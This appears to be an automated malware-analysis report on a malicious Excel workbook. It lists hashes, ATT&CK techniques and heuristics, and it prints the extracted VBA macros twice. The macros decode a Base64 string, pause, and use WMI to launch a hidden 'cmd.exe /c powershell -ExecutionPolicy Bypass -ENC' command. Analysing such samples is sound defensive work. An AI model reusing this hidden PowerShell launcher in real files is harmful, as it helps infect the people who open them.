Office (OOXML) malware analysis — malicious · b2392c89c62fa705

MALICIOUS

Office (OOXML)

41.5 KB Created: 2021-06-22 12:43:05 UTC Authoring application: Microsoft Excel 16.0300

MD5: e8e91cbdff0af7016d65842060aa1e25 SHA-1: b42f665cf0e25a60ffccdbc815a9afda1f53be7f SHA-256: b2392c89c62fa705984345368d3977ef329386979fbd1684e5b445b66abc4f0a

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The Excel document contains VBA macros that reference cmd.exe and PowerShell. The GetObject call suggests an attempt to load and execute external code. The presence of obfuscated VBA code, including a Base64 decoding function, indicates a strong likelihood that the macros are designed to download and execute a second-stage payload. The specific family is not identifiable from the provided evidence.

Heuristics 4

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA
GetObject call high OLE_VBA_GETOBJ

GetObject call
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas
3294f1c65f89c50dcf511783d86f092eb5842c1a7c466322e5ca6d9910fa85b7 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 34430 bytes

Filename	Kind	Source	Size
`macros.bas` `3294f1c65f89c50dcf511783d86f092eb5842c1a7c466322e5ca6d9910fa85b7`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	34430 bytes
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Const clOneMask = 16515072 Private Const clTwoMask = 258048 Private Const clThreeMask = 4032 Private Const clFourMask = 63 Private Const clHighMask = 16711680 Private Const clMidMask = 65280 Private Const clLowMask = 255 Private Const cl2Exp18 = 262144 Private Const cl2Exp12 = 4096 Private Const cl2Exp6 = 64 Private Const cl2Exp8 = 256 Private Const cl2Exp16 = 65536 Public Function Decode64(sString As String) As String Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String Dim lTemp As Long sString = Replace(sString, vbCr, vbNullString) sString = Replace(sString, vbLf, vbNullString) lTemp = Len(sString) Mod 4 If lTemp Then Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.") End If If InStrRev(sString, "==") Then iPad = 2 ElseIf InStrRev(sString, "=") Then iPad = 1 End If For lTemp = 0 To 255 Select Case lTemp Case 65 To 90 bTrans(lTemp) = lTemp - 65 Case 97 To 122 bTrans(lTemp) = lTemp - 71 Case 48 To 57 bTrans(lTemp) = lTemp + 4 Case 43 bTrans(lTemp) = 62 Case 47 bTrans(lTemp) = 63 End Select Next lTemp For lTemp = 0 To 63 lPowers6(lTemp) = lTemp * cl2Exp6 lPowers12(lTemp) = lTemp * cl2Exp12 lPowers18(lTemp) = lTemp * cl2Exp18 Next lTemp bIn = StrConv(sString, vbFromUnicode) ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1) For lChar = 0 To UBound(bIn) Step 4 lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _ lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) lTemp = lQuad And clHighMask bOut(lPos) = lTemp \ cl2Exp16 lTemp = lQuad And clMidMask bOut(lPos + 1) = lTemp \ cl2Exp8 bOut(lPos + 2) = lQuad And clLowMask lPos = lPos + 3 Next lChar sOut = StrConv(bOut, vbUnicode) If iPad Then sOut = Left$(sOut, Len(sOut) - iPad) Decode64 = sOut End Function Public Sub Pause(sngSecs As Single) Dim sngEnd As Single sngEnd = Timer + sngSecs While Timer < sngEnd DoEvents Wend End Sub Private Function VerifyPath() Dim fileStr As String VerifyPath = Decode64(JVG_Status_EMSJA()) End Function Private Sub JePyNe() Pause (38) Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Dim strstr As String strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(JVG_Status_EMSJA()), vbFromUnicode) + """" Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") objProcess.Create strstr, Null, objConfig, intProcessID End ... (truncated)
`vbaProject_00.bin` `41ffb27a01beaec127178ff39aa3d67860e9ead9dc2fd4c83829f9680388d1a0`	vba-project	OOXML VBA project: xl/vbaProject.bin	11264 bytes

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Const clOneMask = 16515072   
Private Const clTwoMask = 258048     
Private Const clThreeMask = 4032     
Private Const clFourMask = 63        
Private Const clHighMask = 16711680  
Private Const clMidMask = 65280      
Private Const clLowMask = 255        
Private Const cl2Exp18 = 262144      
Private Const cl2Exp12 = 4096        
Private Const cl2Exp6 = 64           
Private Const cl2Exp8 = 256          
Private Const cl2Exp16 = 65536       

Public Function Decode64(sString As String) As String                                                    
	Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long    
	Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String 
	Dim lTemp As Long                                                                                      
	sString = Replace(sString, vbCr, vbNullString)                                                         
	sString = Replace(sString, vbLf, vbNullString)                                                         
	lTemp = Len(sString) Mod 4                                                                             
	If lTemp Then                                                                                          
		Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")                   
	End If                                                                                                 
	If InStrRev(sString, "==") Then                                                                      
		iPad = 2                                                                                             
	ElseIf InStrRev(sString, "=") Then                                                                   
		iPad = 1                                                                                             
	End If                                                                                                 
	For lTemp = 0 To 255              
		Select Case lTemp
			Case 65 To 90
				bTrans(lTemp) = lTemp - 65 
			Case 97 To 122
				bTrans(lTemp) = lTemp - 71
			Case 48 To 57
				bTrans(lTemp) = lTemp + 4
			Case 43
				bTrans(lTemp) = 62
			Case 47
				bTrans(lTemp) = 63
		End Select
	Next lTemp
	For lTemp = 0 To 63
		lPowers6(lTemp) = lTemp * cl2Exp6
		lPowers12(lTemp) = lTemp * cl2Exp12
		lPowers18(lTemp) = lTemp * cl2Exp18
	Next lTemp
	bIn = StrConv(sString, vbFromUnicode) 
	ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
	For lChar = 0 To UBound(bIn) Step 4
		lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
				lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) 
		lTemp = lQuad And clHighMask
		bOut(lPos) = lTemp \ cl2Exp16
		lTemp = lQuad And clMidMask
		bOut(lPos + 1) = lTemp \ cl2Exp8
		bOut(lPos + 2) = lQuad And clLowMask
		lPos = lPos + 3
	Next lChar
	sOut = StrConv(bOut, vbUnicode)    
	If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
	Decode64 = sOut
End Function


Public Sub Pause(sngSecs As Single)
	Dim sngEnd As Single
	sngEnd = Timer + sngSecs
	While Timer < sngEnd
		DoEvents
	Wend
End Sub


Private Function VerifyPath()
	Dim fileStr As String
	VerifyPath = Decode64(JVG_Status_EMSJA())
End Function

Private Sub JePyNe()
	Pause (38)
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = 0
	Dim strstr As String
	strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(JVG_Status_EMSJA()), vbFromUnicode) + """"
	Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
	objProcess.Create strstr, Null, objConfig, intProcessID
End 
... (truncated)

vbaProject_00.bin
41ffb27a01beaec127178ff39aa3d67860e9ead9dc2fd4c83829f9680388d1a0 vba-project OOXML VBA project: xl/vbaProject.bin 11264 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.